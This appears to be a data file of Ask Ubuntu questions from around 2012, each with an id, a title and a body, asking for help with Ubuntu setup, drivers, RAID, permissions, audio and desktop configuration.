107074	how to tell network manager not to show wireless ap with poor quality	is it possible to tell network manager not to show wireless access points that have very poor quality or are below a specific quality level . if not , an alternative that can limit the amount of ap based on the quality for them . using both , 11.10 and 12.04 right now .
107085	how to set resolutions with xrandr using multiple monitors	i want to set specific resolutions to 2 monitors . how can i tell xrandr which monitor to change resolution .
107101	which groups should i normally belong to ?	i accidently removed my user name from most of the groups it belonged to . i indeed miswrote sudo usermod -ag agmenor agmenor by forgetting the -a option . i found this question to add myself back to the sudoers group , which i 'll do at my next reboot . but after that , what other groups should i also add my user to ? i know it depends largely on the programs i have installed ; for example i should belong to debian-tor if i have vidalia installed . but what are , at least , the groups i should belong to as if i was on a fresh install ? for instance , on another machine , the command groups returns agmenor adm dialout cdrom plugdev lpadmin admin sambashare debian-tor .
107102	how should been set permissions for / , /home etc . freshly after instalation of ubuntu ?	i had a problem to boot ubuntu 11.10 after instalation caused by lack of permissions on freshly set partitions ( partitions made by disk utility on live cd ) . i gave all permissions to all files to any user . how i should set it back to work properly with ubuntu ?
107117	wubi installation wo n't start	i 've just installed ubuntu 11.10 via wubi . everything was going ok , but all the sudden it started going slow , freezing during file operations and then complete freeze . i restarted the pc an now it wont start in ubuntu . after i select ubuntu from the boot screen , the screen goes purple like it 's going to start , but stays that way , no mouse , no keybord . any ideas ? thanks in advance ... p.s : i 'm running windows 7 , in case it matters .
107118	password protecting a private ntfs folder	here 's the story . i recently moved to ubuntu from windows using the wubi installer . the issue is that i have a private folder on my windows ntfs partition . it is configured so that no listing permissions are given to any other user but mine . the folder is password protected in windows with folderguard . the deal is that this folder is perfectly acessible using my ubuntu installation which makes me concerned . so the question is : is there any way to password protect a folder inside a ntfs partition in ubuntu ? ubuntu virtual disks are on the same partition where the private folder is located .
107119	why is my new user being asked for a sudo password ?	i 'm running ubuntu 11.10 . i 'm trying to setup a user that 's essentially a clone of the permissions of the ubuntu user . this works but i 'm not able to sudo with this new user without supplying a password ( which i do n't even have for this user ) . how can i set it up to work the same way as the ubuntu user ? here 's what i did ( i 'm doing this over ssh by the way ) : i created a new user with : sudo useradd -d /home/ryan -m ryan then i added this user to the admin group with : sudo usermod -a -g admin ryan then i cloned the ssh keys that are setup for the ubuntu user over to this new user : sudo mkdir /home/ryan/.ssh sudo chown ryan : ryan /home/ryan/.ssh sudo cp /home/ubuntu/.ssh/authorized_keys /home/ryan/.ssh sudo chown ryan : ryan /home/ryan/.ssh/authorized_keys i then was able to ssh to the machine as ryan using the key to authenticate me . but when i try to do a sudo commend i get prompted for a password : ryan @ machine : ~ $ sudo /etc/passwd [ sudo ] password for ryan : how can i bypass this ? basically i want it to work like the ubuntu user ...
107120	libre office button titles are black	when i open a document in libre office writer all the toolbar button 's titles are black . anyone seen this before ? i can just barely make out what the text is . it was n't this way before and i have n't been messing with any settings .
107127	panel indicator for totem ( default movie player ) or for audio playing ?	sometimes i mute the volume and forget a song or internet radio station is playing . i need a visual cue to tell me the song is playing in the background while in mute . is there an indicator for audio/sound that is playing ?
107132	how can i automate the backing up of cron jobs ?	in the even of a crash i realize that i may not be backing up system and user cron jobs . how can i automate the backing up of my systems cron jobs ?
107144	why is new raid 5 build 'recovering ' ?	i am building a home server with raid 5 . i first set up the system to boot from compact flash . after i got that working i tried to create the raid 5 array . all disks are new and have no data on them . i used the following command to create the array : mdadm -- create -- verbose /dev/md0 -- level=5 -- raid-devices=3 /dev/sd [ bcd ] 1 after this i ran 'watch cat /proc/mdstat ' . the system is recovering - very very slowly ( like 40 hours to recover ) . how do i tell the system these are new disks with no user data on ? i do n't want to recover anything .
107149	ca n't remove ~/.local/share/recently-used.xbel	i saw this post : prevent gnome-shell 's dash from listing recent items and i 'm not able to remove the recently.used.xbel file . do i need to be root to do this ? -rw -- -- -- - 1 ryan ryan 39157 2012-02-19 15:47 /home/ryan/.local/share/recently-used.xbel -- when i run rm ~/.local/share/recently-used.xbel i get rm : can not remove `/home/ryan/.local/share/recently-used.xbel ' : operation not permitted running the same command with sudo returns the same error , and running nautilus as root also returns a similar error .
107151	ssh as root to a ubuntu server	my public key was recently added to a ubuntu server so that i can remotely log in as root . however , when i log in as root . i cant do some simple tasks like mkdir . is there something i am missing here . root users are supposed to be able to do everything . right ? i get a permission denied when i try to create a directory somewhere else other than my root home directory .
107153	what is the ask ubuntu clean up script ?	how and where is the script installed ? // ==userscript== // @ name ask ubuntu clean up // @ namespace http : //userscripts.org/users/217436 // @ include http : //cleanup.thepcspy.com/* // @ include http : //askubuntu.com/* // @ include http : //www.askubuntu.com/* // ==/userscript== var script = document.createelement ( `` script '' ) ; script.textcontent = `` ( `` + function ( ) { if ( window.location.hostname.indexof ( `` cleanup.thepcspy.com '' ) ! = -1 ) return $ ( ' # barbanner ' ) .hide ( ) ; $ ( 'head ' ) .append ( ' < link rel= '' stylesheet '' href= '' http : //cleanup.thepcspy.com/media/external.css '' type= '' text/css '' / > ' ) ; $ ( ' # custom-header ' ) .after ( ' < div id= '' aucuholder '' class= '' container '' > < /div > ' ) ; $ .getjson ( 'http : //cleanup.thepcspy.com/ ? callback= ? ' , function ( data ) { $ ( ' # aucuholder ' ) .html ( data ) ; $ ( ' # aucuopen ' ) .click ( function ( ) { $ ( ' # aucuqs ' ) .toggle ( ) ; return false ; } ) } ) ; } .tostring ( ) + `` ) ( ) ; '' ; document.body.appendchild ( script ) ;
107154	black screen with cursor after resume from suspend	so , i have ubuntu 11.10 dual booting on my computer . everything seems to be working fine , except when i come back from suspend , the screen is black and my mouse pointer is displayed . it occasionally changes to a cursor , if i move the mouse around . i can type in my password , and after 10-30 seconds the computer resumes perfectly fine , except the unity panel ( on the left ) is fuzzy until i bring the mouse over it . any ideas how to solve this ? computer info : processor 8x intel ( r ) core ( tm ) i7 cpu 960 @ 3.20ghz memory 8258mb ( 1715mb used ) operating system ubuntu 11.10 kernel linux 3.0.0-16-generic-pae ( i686 ) geforce 450 gts video card
107159	ubuntu 11.10 wo n't start ?	starting cpu interrupts balacing daemon [ ok ] then it takes forever go from line to line ex after that line , [ 44,148085 ] ieee80211 phy0 : wl_ops_bss_info_change : gos enabled : true ( inplemented ) [ 44.149096 ] ieee80211 phy0 : brcmsmac : wl-ops_bss_info_changed : associated and it will go on like this , taking literately forever from line to line . gradually the number in the square brackets increases with the line . help , what exactly does this mean ? i ca n't even get to the log on menu . this all happened after i try to restart upon installing the ati drive for linux . now it 's like this ... what is up exactly ?
107161	is it possible to transfer files from windows 7 to ubuntu ? using dual boot	i plan to use ubuntu , but i do n't know if i can transfer files from windows to ubuntu . any help please ?
107169	msi laptop rt3090 wireless lan hard blocked , how do i unblock it ?	in rfkill list my wireless lan shows as `` hard blocked '' . how can i unblock it ?
107173	is it possible to ssh through port 80 ?	i am behind a network firewall that does n't let me ssh through the default port . because of that , i ca n't push any bzr branches to my repository . i would like to know if it is possible to somehow proxy the ssh through port 80 so i can push the branches . i heard that corkscrew lets you do that but i am not sure how to do that exactly . if you know any working proxy server that lets you do that , please do mention them .
107177	how can i remove gpg key that i added using apt-key add - ?	i do n't need the key in my server 's keyring anymore . is it possible to remove it ? i added the key using this command : curl http : //repo.varnish-cache.org/debian/gpg-key.txt | apt-key add - thanks for helping
107180	i ca n't install the multitouch driver if i do `sudo apt-get install xf86-input-multitouch`	i am running ubuntu 11.10 and have added the mactel ppa but i ca n't install sudo apt-get install xf86-input-multitouch i have done this : sudo add-apt-repository ppa : mactel-support & & sudo apt-get update expecting this to work : http : //bitmath.org/code/multitouch/ i ca n't find the multitouch driver anywhere ! update after using the first answer by scott stookey i get this : i guess i will open another question as to how to revert to the stable ubuntu packages ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : xserver-xorg-input-multitouch : depends : xorg-input-abi-12 e : unable to correct problems , you have held broken packages .
107187	how to launch gui app with upstart script	i have a python gtk app i need to run when a user logs in . i ca n't get upstart to launch any gui app , even if x is running . when i 'm signed into x , and i emit the event from the upstart script below guitest with initctl , i get initctl : event failed here is an example of my script , except i 've replaced gedit with my app . how can i modify this script so gedit or my python gtk app will launch ? task start on desktop-session-start or guitest script gedit end script
107192	how can i install eclipse with the adt ( android development tool ) on ubuntu 11.10 64-bit ?	there is the android documentation : http : //developer.android.com/sdk/installing.html and there is this wordpress blog i found : http : //bhargavg.wordpress.com/2011/12/24/installing-android-development-environment-on-ubuntu-11-10/ neither worked for me out of the box . but by piecing together bits and pieces from other sources , i think i have managed to configure eclipse to run with the adt plugin . i will post a step-by-step guide here with my source . there is also this nicely detailed step-by-step guide for ubuntu 10.10 listed in another question that deserves mention : http : //www.futuredesktop.com/maverick/android/developing_android_apps_on_ubuntu.html again , i do n't think the steps listed there will work for 11.10 64-bit , but it offers an excellent overview of the process in general .
107193	ca n't boot ubuntu on lenovo v570	i recently tried to install ubuntu on my new lenovo v570 , planning to dual boot 11.10 with windows 7 . i realized after installing that it would boot straight into windows , so i looked up the issue . i read something about uefi , and found a page suggesting that i wipe the drive with gparted , installing a msdos partition table , and then install ubuntu . ( i tried linux mint first , because that 's what i had on my flash drive at the moment . ) i attempted this , and now i 'm left with a computer that wo n't boot anything from the hard drive . if i install ubuntu or linux mint 12 using either msdos or gpt , it simply skips the hard drive . my bios has no option to disable efi , and i 'll admit i know shamefully little about efi or different types of partition tables . i 'd like to know what i have to do to make my computer boot again .
107195	change window move funcitonality to mirror osx 's zooom2	on osx i use zooom2 to move my windows around with keyboard shortcuts and mouse motion . this operates in a very similar manner to ubuntu , with the following difference : on zooom2 , i have it set so holding down shift + cmd when the cursor is over a window and dragging the mouse moves said window . shift + alt + mouse move resizes . on ubuntu , window movement is achieved by holding alt and clicking in a window , then dragging the mouse . the clicking required in ubuntu is fine when using a mouse , but i find it ends up being a bit of strain when using the trackpad - i miss osx 's no-click version . is there a way of customising the window moves so i do n't have to actually click ?
107198	libreoffice 3.5 wo n't launch from desktop shortcut : ubuntu 11.10 unity	i 've upgraded my libreoffice to the recent 3.5 version . before , i was using lo 3.45 and it had no problems on launching from the desktop shortcut . anyways , when i upgraded and tried to create a shortcut from the launcher it reported this , '' the application launcher `` libreoffice3.5-base.desktop '' has not been marked as trusted . if you do not know the source of this file , launching it may be unsafe . '' any ideas of fixing this . thanks in advance : regards
107206	can we use microsoft excel keywords in ubuntu 's office as we are now using in windows xp ?	please inform me about this as soon as possible.11.04 1 . also tell me that after installing ubuntu , is there any need to install all the ms-office again ? or we could be just able to carry on with our old & default ms-office ? please tell us about this because , we are eager to know about this and we want to install ubuntu on our pc .
107208	how to setup a lan between ubuntu and windows	i wan na transfer some files from this pc with ubuntu to a pc with windows 7 i do n't care how to do it ( ftp , samba or whatever ) i wan na know the steps , i searched a lot but i ca n't find anything that works . thank you .
107210	permission denied in sites-available	i am new to ubuntu.i install lamp pakage acording to this page . i want to create new website such as say in this article . but when i create my site in `` sites-avalible '' and whant to chanege it and save , show a message ... error opening file '/etc/apache2/sites-available/mysite ' : permission denied the file on disk may now be truncated ! what i should to do ?
107211	failed to install openstack dashboard	i 'm trying to install a cloud following the openstack 's official document . when i try to install dashboard on the cloud controller : http : //docs.openstack.org/diablo/openstack-compute/install/content/configure-dashboard.html i had error when trying to sync database : $ /usr/share/openstack-dashboard/dashboard/manage.py syncdb error : root : no module named local.local_settings traceback ( most recent call last ) : file `` /usr/share/openstack-dashboard/dashboard/settings.py '' , line 117 , in < module > from local.local_settings import * importerror : no module named local.local_settings error : root : no module named local.local_settings traceback ( most recent call last ) : file `` /usr/share/openstack-dashboard/dashboard/../dashboard/settings.py '' , line 117 , in < module > from local.local_settings import * importerror : no module named local.local_settings traceback ( most recent call last ) : file `` ./dashboard/manage.py '' , line 31 , in < module > execute_manager ( settings ) file `` /usr/lib/pymodules/python2.7/django/core/management/__init__.py '' , line 438 , in execute_manager utility.execute ( ) file `` /usr/lib/pymodules/python2.7/django/core/management/__init__.py '' , line 379 , in execute self.fetch_command ( subcommand ) .run_from_argv ( self.argv ) file `` /usr/lib/pymodules/python2.7/django/core/management/base.py '' , line 191 , in run_from_argv self.execute ( *args , **options.__dict__ ) file `` /usr/lib/pymodules/python2.7/django/core/management/base.py '' , line 220 , in execute output = self.handle ( *args , **options ) file `` /usr/lib/pymodules/python2.7/django/core/management/base.py '' , line 351 , in handle return self.handle_noargs ( **options ) file `` /usr/lib/pymodules/python2.7/django/core/management/commands/syncdb.py '' , line 56 , in handle_noargs cursor = connection.cursor ( ) file `` /usr/lib/pymodules/python2.7/django/db/backends/dummy/base.py '' , line 15 , in complain raise improperlyconfigured ( `` you have n't set the database engine setting yet . '' ) django.core.exceptions.improperlyconfigured : you have n't set the database engine setting yet . my /usr/share/openstack-dashboard/local/local_settings.py is the same in the guide . i installed python-mysqldb , but i does n't change . then i try to install dashboard from git like in wiki : http : //wiki.openstack.org/openstackdashboard but i had the same error . i use virtualbox to install 2 servers , each one runs ubuntu server 11.10 amd64 . everything fine , except for dashboard ! how can i fix it ? thank you !
107213	sony walkman mp3 player not mounting in xubuntu 11.10	i recently upgraded from ubuntu 10.04 to ubuntu 11.10 with xubuntu-desktop installed over it ( i do n't like unity ) , and have found that when i plug in my sony walkman nwz-b153 mp3 player , it does not mount as expected . i have checked on lsusb and the device is recognised , rhythmbox also picks up the mp3 player and shows it in the 'devices ' list . however , i can not browse the mp3 player 's files through either pcmanfm or thunar . i installed the usbmount package and this seems to have preemptively solved the problem for other usb devices , as i can access other usb pen drives through the /media/usb/ address . the mp3 seems to show itself nowhere except through rhythmbox and lsusb so if someone can offer a solution so i can browse its files , that would be greatly appreciated . i know this sort of question has been asked a lot , but none of the provided answers give me a solution .
107214	recording from soundcard ubuntu 11.04	i switched from the gnome panel desktop environment to xfce recently , and i just noticed that i can no longer record sound using the pulseaudio command line . the command i am using is parec -d combined.monitor | oggenc -b 320 -- managed -o test.ogg -- raw - . i mirrored the sound from the application to all output sinks using pulseaudio , which generates the combined.monitor source . on a possibly related note , i can not extract audio from youtube videos using youtube-dl .
107219	triple boot ubuntu , windows and mac problem	i run on an intel core 2 duo late 2009 imac 21.5 '' i have refit installed which changes boot camp ( efi or w.e ) to show a triple os boot , mac , windows , and linux . i want to install to my wd elements 2tb external hdd but it never works , i 've been through some techniques in the installation to get it to work . so.. i install boot loader ( grub ) to sdb like i should , sdb has root , boot , and swap partitions ( as well as free space ) .. dw boot has at least 258mb . when i reach the end of the setup where it tells me to restart my computer i hit that , then it comes to a black screen showing logging information , closing processes and whatnot , then the mac ejects the installation disc and tells me to hit enter to restart . every fricken time i do this ( from installing ) it freezes as soon as i hit enter ; ' ( ! so i have to force-off my mac and reboot . i 've tried rebooting with and without refit cd but still ( unless i hold alt ( or option for you mac users ) it goes to the refit treiple boot screen , it shows linux so i click that , and it boots up windows instead.. wtf ? can someone please help , otherwise i 'll be turned off linux or ubuntu : ( [ edit : ] sorry for this being too long for some people , really , it 's not that long ; )
107228	how to resize virtual machine disk ?	is there anyway to resize a virtual machine 's disk ? say increasing the disk size from 32gb to 64gb . i am running kvm/qemu on ubuntu server 11.10 64bit . thanks .
107230	what happened to the ia32-libs package ?	the ia32-libs package is no longer present in ubuntu 12.04 repositories for a 64bit system . are there any available replacement packages available for download ?
107232	how to restore data from a damaged partition	i unknowingly tried to change my 480 gb ntfs partition to ext4 from gparted . it did not warn me about any formatting , so i thought the data would be preserved . however , it encountered an error and now my partition is missing from nautilus . gparted and disc utility show it as unknown unformatted partition . i want to recover my data now . how can it be done ?
107234	how can i assign a keyboard shortcut to the 'clear ' option in the messaging menu ?	say i get a new email , i get a notify osd message indicating subject and sender , and the messaging menu envelope turns blue . to clear the blue indicator , i usually click on the blue envelope , and select 'clear ' - the last option in that menu . i would prefer to use a shortcut for doing this . maybe a command in ccms - but what would be the command ?
107236	cli : extract metadata , properties from video files	i would like to extract some properties and metadata from video files , e.g . : resolution codec sound quality and format how do i do it form the command line ?
107237	how to run adobe illustrator cs4 in ubuntu 10.10	first i apologize for asking a question like this , i have no interest in inkscape , i 've tried installing adobe master collection in ubuntu but it failed , some people said to use virtual box and try it but it is too slow- i tried it.do i need to install any other package with wine or something
107239	vnc with current desktop	i have used vnc a few times and what i find is that vnc ca n't be used to control the `` current '' or `` main '' desktop . what i mean by this is i ca n't go out , and leave my machine on , leave my work open and fire up vnc server , then connect in remotely and access the programs i have left open . this is becauase vnc does n't seem to want to bind to desktop `` :0 '' , instead i can only use it to connect into a new instance of the desktop interface with no programs open . is this just me , or is there no way to have remote access to my actual desktop and currently running apps ( even if this means using some other program other than vnc ) ?
107242	copy-paste problem	i 'm relatively new to linux . my question is , why when i do ctrl+c ( copy ) in eclipse , and then shift+insert ( paste ) in command line , there 's nothing pasted ? thanks .
107248	java : permission denied	i currently only have sun jdk7 installed on my system in regards to java . when i try to run a program ( the unix runescape client ) , here is what comes up in my terminal : trying to read /home/ryanmcclure/programs/runescape/share/settings.conf error reading settings.conf , using default value : 0 error reading settings.conf , using default value : default-java error reading settings.conf , using default value : 0 error reading settings.conf , using default value : runescape.prm reading .prm file /home/ryanmcclure/programs/runescape/share/runescape.prm this is the info i gathered from the runescape.prm file # # file start -djava.class.path=jagexappletviewer.jar -dsun.java2d.noddraw=true -dcom.jagex.config=http : //www.runescape.com/k=3/l= $ ( language:0 ) /jav_config.ws -xmx256m -xss1m jagexappletviewer # # file end i will now parse the parameters ! checking your client language setting ( if any ) trying to read file /home/ryanmcclure/jagexappletviewer.preferences unable to read jagexappletviewer.preferences file , defaulting to language=0 ( english ) . i will now parse the contents from the jagexappletviewer.preferences file so it can be used . stitching the language setting to the final parameters . final parameter string is : jagexappletviewer.jar -dsun.java2d.noddraw=true -dcom.jagex.config=http : //www.runescape.com/k=3/l=0/jav_config.ws -xmx256m -xss1m jagexappletviewer launching client using this java version : sh : java : permission denied launching the runescape client using this command : cd /home/ryanmcclure/programs/runescape/bin & & java -cp jagexappletviewer.jar -dsun.java2d.noddraw=true -dcom.jagex.config=http : //www.runescape.com/k=3/l=0/jav_config.ws -xmx256m -xss1m jagexappletviewer /share executing the runescape client ! you are now in the hands of jagex . # # end of script # # jagex client output will appear below here sh : java : permission denied what exactly does permission denied mean with java ? please help ! ! !
107252	which readlinex-dev should i install ?	i 'm installing postgresql from source . the installation guide states : if you are using a package-based linux distribution , be aware that you need both the readline and readline-devel packages , if those are separate in your distribution . i 'm on ubuntu 11.04 and looking at synaptic i see that both libreadline5 and libreadline6 are installed , but not libreadline5-dev or libreadline6-dev . so , should i install libreadline5-dev or libreadline6-dev ?
107253	raid 5 name changing during reboot	i left my server running all night 'recovering ' after i built a new raid 5 array using the command : mdadm -- create -- verbose /dev/md0 -- level=5 -- raid-devices=3 /dev/sd [ bcd ] 1 my server spent all night rebuilding and i got the desired results : amir @ supermassive : ~ $ sudo mdadm -- detail -- scan [ sudo ] password for amir : array /dev/md0 metadata=1.2 name=supermassive:0 uuid=2f693f45 : accebaf0:70060db8 : c5cb42e0 i tried to add this to my mdadm.conf file but kept getting permission denied errors . amir @ supermassive : ~ $ sudo mdadm -- detail -- scan > > /etc/mdadm/mdadm.conf -bash : /etc/mdadm/mdadm.conf : permission denied for some reason which i can not explain i thought a reboot would be a good idea . i did not think about the fact that i had not added my array to the mdadm.conf file . now when i look at my arrow the name has changed from /dev/md to /dev/md/supermassive:0 amir @ supermassive : ~ $ sudo mdadm -- detail -- scan [ sudo ] password for amir : array /dev/md/supermassive:0 metadata=1.2 name=supermassive:0 uuid=2f693f45 : accebaf0:70060db8 : c5cb42e0 can anyone tell me how to fix this ? i really do n't want to have to go through another recovery : ( i edited the mdadm.conf file to include the proper line from the first mdadm detail scan but after reboot i still get the output from the last mdadm detail scan with the name being /dev/md/supermassive:0 . another thing ot note is that in /dev instead of having md0 and md0p1 i have md127 and md127p1 . : (
107254	how can i fetch all in rabbitvcs git ?	using command-line git i can fetch updates to all branches using git fetch -- all . is this possible in rabbitvcs ? if so , how ?
107261	problems doing remote admin via ssh	i am connected to an ubuntu host ( 10.04.3 lts ) via ssh -x . all is ok . however , i can not do any administrative tasks via system- > administration- > xxx , such as adding a user , because the system never asks me for a password , and ignores any change requests i have . if however i go to the host and log-in conventionally , everything works as expected . in other words , the system discriminates me when i am logged-in via ssh . where 's the trick ? tx luis
107262	vlc with hardware acceleration crashes if launched from the unity dash	background i 'm running ubuntu 11.10 ( 64-bit ) on a computer with an amd e-450 apu . this chip has an integrated radeon hd6320 graphics processor . i successfully installed the latest proprietary driver from amd ( catalyst 12.1 ) . i have also installed the xvba backend for vaapi , and confirmed that it works . what does work after having installed the aforementioned software , gpu acceleration in vlc works perfectly . 1080p material plays smoothly , while without gpu acceleration it was like watching a slide-show of images . so far so good . what does n't work for the problem to present itself , two factors must be present . gpu acceleration must be enabled in vlc and the material to be played must take advantage of it , e.g . h.264 or the like vlc must be launched from the dash ( the menu you get by pressing the super-key in unity ) whether the program itself is launched from the dash and the material to be played is chosen from within vlc , or the material is picked directly from within the dash does n't matter launching from the unity launcher has the same effect if the above is true , vlc crashes 100 % of the time , while if it is launched in any other way ( e.g . from terminal with vlc or from nautilus with 'open with vlc media player ' ) it never crashes . what i have tried i have installed vlc 2.0.1 from ppa : videolan/stable-daily . this did not affect the problem in any way . i have made a fresh install of both ubuntu and vlc , but the issue remains . the question ( s ) why does the application behave differently when launched from the dash ? what can i do to fix the problem ?
107269	ubuntu one for android ask for login info every time	every time i connect to the ubuntu one app from my android device ( samsung galaxy ace , 2.3 ) the app asks for my username and password . is this a normal behavior ? sync works perfect , every time i take a picture it is uploaded to my ubuntu one account . and also my phone is repeated many times on my devices list when i connect to ubuntu one on my computer , seems like every time i login on the android app , it creates a new record on my account .
107272	sagem 802.11g cardbus ( wpcb-165g ( r ) ) driver	where can i find sagem 802.11g cardbus ( wpcb-165g ( r ) ) driver and how can i install it on ubuntu 11.10 and ubuntu 12.04 alpha 2
107276	how can i get a script to always run on resume in lubuntu ?	i 've run into an annoyance on lubuntu 11.10 , described here : http : //ubuntuforums.org/showthread.php ? t=1869357 i came up with a workaround , described here : http : //ubuntuforums.org/showpost.php ? p=11714061 & postcount=30 my workaround involves putting a script in /etc/pm/sleep.d to run on resume . however , the workaround only seems to work when i suspend using pm-suspend . when i suspend by closing my laptop 's lid , my workaround fails . how can i get a script to run when i resume from sleep , and that sleep was triggered by closing the lid ? details : i suspect this failure might be because scripts in /etc/pm/sleep.d are not getting executed when i suspend by closing the lid . suspending with pm-suspend , then resuming by closing/opening the lid works fine . i believe lubuntu uses xfce4-power-manager to handle suspension due to lid closing , perhaps this is important ? i prefer to suspend by closing my laptop 's lid , rather than typing a terminal command . edit : by inspecting /var/log/pm-suspend.log as suggested by andrewsomething , we can see that the reset_panel script runs on every resume , it just fails on resumes that follow lid-triggered suspends . i followed his further suggestion that i add an export statement to my script , and things are working now . the script triggers too early in the wakeup process , but that 's not hard to fix . the current version of the script : # ! /bin/bash case `` $ 1 '' in suspend|hibernate ) # do nothing ; ; resume|thaw ) export display=:0 # what does this do ? are there side effects ? sleep 5 & & lxpanelctl restart & # delayed so the battery icon can finish wrecking shop . ; ; * ) exit 1 ; ; esac exit 0 andrewsomething , if you want to post an answer , i 'll accept . thanks for the help !
107277	how do i switch to another audio output sink in xfce ?	from the command line i can easily create another pulseaudio sink and switch to that but i have not found a way how to do this using a gui from the xfce desktop . in gnome i use gnome-volume-control from audio settings to switch to another audio output sink . is there anything similar in xfce ?
107278	changing jvm in java	i only recently discovered the different jvm 's on the wiki page and thought i 'd start tinkering . its been difficult to find documentation on how to configure java on ubuntu though . lets say i wanted to change the jre or jdk that i 'm using , i could crack open a terminal and say sudo update-alternatives -- config java and then pick from one of the installed versions . if i 'm understanding jvm 's right ( which i may very well be not ) , you can configure the openjdk to use alternative jvm 's ( eg jamvm ) and run it as such jamvm -jar foo.jar 2 questions , 1 : do i have the concept of a jvm right ? as in , is this possible ? 2 : if so how do i configure the jvm and switch the default to a jvm of my choosing ?
107285	chromium bookmark bar behaviour	i use chromium on two computers ( version 16.0.912.77 on both ) , one running 11.10 and the other running 10.04 . on the 10.04 computer , when i click a folder on the bookmark menu , then point my mouse at a different folder , the new folder opens . however , on 11.10 , if i click open a folder then mouse to another one , the original folder stays open . to switch , i need to click somewhere away from the first folder 's drop down to close it , then click on the new folder . so , how do i make my 11.10 computer have the same behaviour that my 10.04 has now ?
107289	will long-term use of ubuntu via wubi harm my pc ?	i do see a part of my question being discussed already . the specific answer i 'm looking for is , will long-term use of ubuntu via wubi harm my pc ( i.e cause irrevocable h/w failure or damage my windows 7 installation ) ... ? my daily use is a few hrs ( say 4-8 hrs/day ) on wubi-ubuntu . i certainly do n't want to shorten my pc 's expected life-span by using wubi . i am so far glad with wubi 's performance on my thinkpad t510 , so no major complaints on that end . also re-partitioning my hd is not an option for me since i 'm not an `` adept '' in computers and wo n't wan na affect existing win 7 installation or the manufacturer 's recovery partition . thanks in advance for suggestions !
107290	advice on partitioning 11.10 at installation time	i am new to ubuntu and just got a new 1tb hdd , please , help me better understand partitioning at install time so to avoid problems in the future . i was planning to use : device type location filesystem size mount point /dev/sda1 , primary , beginning , ext4 , 50gb / /dev/sda5 , logical , beginning , swap , 8gb not applicable /dev/sda6 , logical , begining , ext5 , 942gb /home i have 4gb ram and i would like to have my /home into a separate partition to try mitigating problems if the drive fails . regarding the types , primary/logical , does it seem all right ? locations ? mount points ? many thanks for your feedback !
107298	is the radeon 6570 supported in ubuntu , or will it be in 12.04 ?	i have problem with the radeon 6570 and the open source kms driver . i tested it on both 11.10 and the daily build ubuntu 12.04 . the problem is that , with open source driver is screen moved 1/3 of screen to right . i tested a 1920x1080 resolution .
107299	help installing linux restricted modules ?	i have to install linux-restricted-modules-3.0.0-12-generic in order to install my lucent dial-up internal modem , but in the terminal , ubuntu says it ca n't find the file . searching on the net , it seems this package for this kernel ( ubuntu 11.10 ) does n't exist . how can i install my modem without this file ? or where can i find it ?
107308	how do i use git with google code on ubuntu ?	i 'm a beginner with git and google code , and i 'm not sure how to set it up so that i can put my source on google code . i read some tutorials but i still do n't understand .
107309	custom livecd without unity still tries to load ubuntu session . ( failed to load session `` ubuntu '' )	i 'm trying to create my own ubuntu livecd without unity . when lightdm loads is says ( failed to load session `` ubuntu '' ) . the autologin fails and then lightdm reloads with a normal login screen . i can login fine with ubuntu user and if i run `` sudo x-session-manager '' i still get the error message ( failed to load session `` ubuntu '' ) . but that 's as far as i can pin point where the problem is . where is the default session manager setting ? lightdm config /etc/lightdm/lightdm.conf says that autologin-session=lightdm-autologin but i 'm not sure what that is . trying to edit this config would n't help anyways since casper overwrites it during bootup . i thought maybe casper sets this but do n't see it anywhere in it 's config . any help ? i want the default to be just 'gnome ' . this would have to be set while creating the livecd iso . thanks .
107314	best practices to virtualize ubuntu servers ?	my company is a small startup with about 20 people . we plan to set up a bunch of ubuntu servers : a mail server running zimbra ; a gateway running zentyal ; a content sharing/management server running alfresco ; a web server hosting our company 's website ; an application server running tomcat/mysql hosting our internal business application ; a development server running tomcat/mysql/svn for our software development team ; a domain controller server running samba we have two dell rack servers : poweredge r710 , two intel xeon 5506 ( quad-core ) , 16gb ram , 1tb hdd with raid 0 poweredge r410 , one intel xeon 5506 ( quad-core ) , 8gb ram , 1tb hdd with raid 0 we do n't expect a lot of internet tranfic/mail , but we do expect quite some load on the alfresco server , since there are quite some fairly large excel sheets need to be stored . so my question is : can i virtualize all the above servers and run them on our two dell servers ? if yes , what are the best practices ? thanks .
107316	how can i configure my android tablet to output sound to a remote pulseaudio instance ?	i have a transformer tf101 tablet with ubuntu one music on it . the speakers are good enough , but i have an ubuntu computer hooked up to my nice stereo in my living room . i 'd like to be able to just walk around my apartment with the tablet controlling my music , but have the sound stream going from my network to my ubuntu pc . i know how to configure pulseaudio to do this from linux-to-linux machines , however i am not sure how the tablet fits into this .
107317	how to write a simple scope for a unity lens ?	i am looking for a tutorial on writing a scope for simple search from a website . the tutorial at ubuntu wiki is very complex . if somebody can explain me the steps to write a scope in a simplest way , that would be very helpful .
107323	how do i use strftime to customize the default date-time format ?	the date on my computer currently displays as `` fri feb 24 '' and the system settings give no options for changing the date format . i need the date to display as `` fri 24 feb '' followed by 24-hour-time . could someone help me out to configure `` fri 24 feb '' and then the time in 24-hour ? is there a way to get this time & date format to be default everywhere in ubuntu ( e.g. , in terminal & nautilus ) ?
107325	special symbols are not displayed on tty	i have a console application which is displaying special symbols like ☢ ☍ ⌘ ✰ ⣿ ⚡ ☯ ⚑ ↺ ⤴ ⤵ no matter where - putty ( utf8+use unicode line drawing , but i guess it 's not client issue ) , local console , securecrt - i ca n't see them . instead just squares . here is my shell env variables lang=en_us.utf-8 term=xterm any idea how to make terminal to show those symbols correctly ? update glyph i am interested in python -c 'print u '' \u22c5 \u22c5\u22c5 \u201d \u2019 \u266f \u2622 \u260d \u2318 \u2730 `` \ u '' \u28ff \u26a1 \u262f \u2691 \u21ba \u2934 \u2935 \u2206 \u231a \u2240\u2207 \u2707 `` \ u '' \u26a0\xa0\u25d4 \u26a1\xa0\u21af \xbf \u2a02 \u2716 \u21e3 \u21e1 \u2801 \u2809 `` \ u '' \u280b \u281b \u281f \u283f \u287f \u28ff \u2639 \u2780 \u2781 \u2782 \u2783 \u2784 `` \ u '' \u2785 \u2786 \u2787 \u2788 \u2789 \u25b9\xa0\u254d \u25aa \u26af \u2692 \u25cc `` \ u '' \u21c5 \u21a1 \u219f \u229b \u267a `` .encode ( `` utf8 '' ) ' screenshot with ubuntu font screenshot with dejavu font
